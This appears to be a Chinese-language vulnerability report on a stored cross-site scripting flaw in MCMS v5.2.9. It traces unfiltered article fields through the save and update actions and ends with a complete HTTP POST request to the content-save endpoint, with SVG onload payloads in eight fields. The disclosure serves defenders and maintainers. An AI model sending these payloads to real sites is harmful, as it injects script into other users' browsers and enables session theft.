v5.2.9 前台存储xss

## 漏洞详情

在保存或者更新文章的时候，没有对提交数据做严格的过滤。生成文章时，在前台照成xss攻击。

```
net.mingsoft.cms.action#save()
```

![输入图片说明](https://foruda.gitee.com/images/1670591615627434665/c6ee6143_8724392.png "屏幕截图")

```
net.mingsoft.cms.action#update()
```

![输入图片说明](https://foruda.gitee.com/images/1670591629820076189/d2c3070a_8724392.png "屏幕截图")

```
net.mingsoft.cms.entity
```

在net.mingsoft.cms.entity包下面都是类似JavaBean的写法，set()直接设置，get()获取返回直接返回，没有过滤。

![输入图片说明](https://foruda.gitee.com/images/1670591650878104405/74adeb9c_8724392.png "屏幕截图")

![输入图片说明](https://foruda.gitee.com/images/1670591662611797606/2c01b4fb_8724392.png "屏幕截图")

构造payload

![输入图片说明](https://foruda.gitee.com/images/1670591674105098907/295ec58d_8724392.png "屏幕截图")

可以看到这几个字段都没经过有限过滤。

![输入图片说明](https://foruda.gitee.com/images/1670591702890113254/c6674720_8724392.png "屏幕截图")
生成poc

```
net.mingsoft.cms.action
```

![输入图片说明](https://foruda.gitee.com/images/1670591743520951633/a1741783_8724392.png "屏幕截图")

生成时，会把上面payload直接输出到前台html。

![输入图片说明](https://foruda.gitee.com/images/1670591786903165858/e8df8b9f_8724392.png "屏幕截图")

![输入图片说明](https://foruda.gitee.com/images/1670591800425545439/cf758f37_8724392.png "屏幕截图")

可以看到其中 标题、描述、内容，直接输出到前台HTML。

![输入图片说明](https://foruda.gitee.com/images/1670591809641375121/37f148cc_8724392.png "屏幕截图")

![输入图片说明](https://foruda.gitee.com/images/1670591831941478196/24077898_8724392.png "屏幕截图")

可以看到contentTitle、contentDescription、contentDetails 三个构造的payload触发。

```http
POST /ms/cms/content/save.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Pragma: no-cache
token: null
Content-Length: 491
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/ms/cms/content/form.do
Cookie: Phpstorm-f6f062b4=5f525093-5f84-4757-8d57-73a0807e485f; currentMenuCode=1599107821860655104; pageNo=2; pageSize=20; pageno_cookie=1; SHIRO_SESSION_ID=58a8d37d-8a16-430e-a7ef-925839f673e0; rememberMe=5cjEDUiKQ6EcshxFJv6JNis4+TagGWtfYnhBYTSNM7EP5KDqO2/eXptuk3yigpRYnLtx+I12zn8n+Gst9nIatcPOzKhtmhXsRFeVEZkhMnKk6/hwmvK6bikR3zS59ckqOCyxze4jmESJ8Kh8h50p1w9CchOCxhcH17GpRz29vlPFvdT1iKZHMHncxuhfDCfBj5mQOpwSHtGotKOJoQ+EJdnmcRvkdDRkP/woZ+xvAZTixkRHW1HWn3/nIjapKo5G5EmXeuN+1YmauoeMX9NXg1n4Q3XONqwS3EJC1PMqdLWIOxBjt9vEGC9OnsiUHlZDZnFwxFs9A0gELQUO0qy0/cudGdDamjgFTa4bLCQvJ0GjHCaigPj+PvQ2qPc+dfXuUzC9sYK9E1tv8QtsrEQXjuNoHsc7a0OMvTPSfKYntICLzNfhI8oDF6dZLuW/4pRUYTD9N650hVA/Aa9oDrLMCj10m52kTPrQ0u3yU6VsOSr4vY1D/Zkj7VsHfnN8teAwC0V0CzyDC+PJfIuccESmNSkI/7mtVNV9P45dY8eJZTP+GgAEOLcZB73BYRujlD50iqaeMxUJXQPOZkpE8rCrxZpKS+1sjgti9gbRYdbdiF4b78GNyzOZShCGMIdt06uuDcL4pGIq6iBSVk2v0hf65nbIFhl7Wfn3hZeg6/ETfTqUCYq8vW0TLK6WO7njF/083lb4Pz39Bx2Dejdx5IfQt5oLyxSoqLrDaB87Fuq+96yZz3Iw+VITpahW2UBinDGF25R85PbqKY8SacCQzqQaqHz4zKkPLtIvMEVYld7bMVL+vLU5FB7Da5Ti9ce+XAkUK6nEsWYpJq3ONi5+nzI1ZSIWfEuumIK6xGQ6qpyjPSo732xSfHT+1fpAhs+yTGlFpTk+iht43qK5upi2jcAZcxqy3mFjjbLXVAng7Bp0QbRH+aD+su8H/UEGiOEJ9b6in2zCN/caz6YNmNpjb1ubG3VBOYanpERZEaRuL/5Sl294YE6mBUPfn+CN0xjzJWCiC0KqBI1DCxb6D0u2mLdsXaCbhCv02VyVL3IlHScbE50MXz/ioisb0ccLTNzafP41YjO5bDz1laIsvTw1keROjcltAexzgQxnC42tozLKzedLygLClhuxqvzHMGTnQg5J5nvmYWT96gc7uuEJnyQl4/62RY0bnQ/nj7b81nHxxZQeAUSico2GKeQjJGSTPNWMh++h8sdImqVvbE2ARhkgXsyOIQrmGTN8Tk+g2yVPG947S37PGdUCb2lfzRBV1UQipiNJ1HuSTbfSzNRY5Nfrer0xaI78+Mc5j7xoSswg1r5jsO/zFdL/66U+DO5Q8jsQTn8zjapBYK+nEa0=
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

contentTitle=<svg/onload=console.log('xss1')>&categoryId=1329257757913718785&contentType=<svg/onload=console.log('xss2')>&contentDisplay=0&contentAuthor=<svg/onload=console.log('xss3')>&contentSource=<svg/onload=console.log('xss4')>&contentSort=0&contentImg="><svg/onload%3dconsole.log('xss5')>"<&contentDescription=<svg/onload=console.log('xss6')>&contentKeyword=<svg/onload=console.log('xss7')>&contentDetails=<svg/onload=console.log('xss8')>&contentDatetime=2022-12-08%2005%3A19%3A37&id=0
```

GVP 铭飞/MCMS

内容风险标识

评论 (1)

GVP铭飞/MCMS

内容风险标识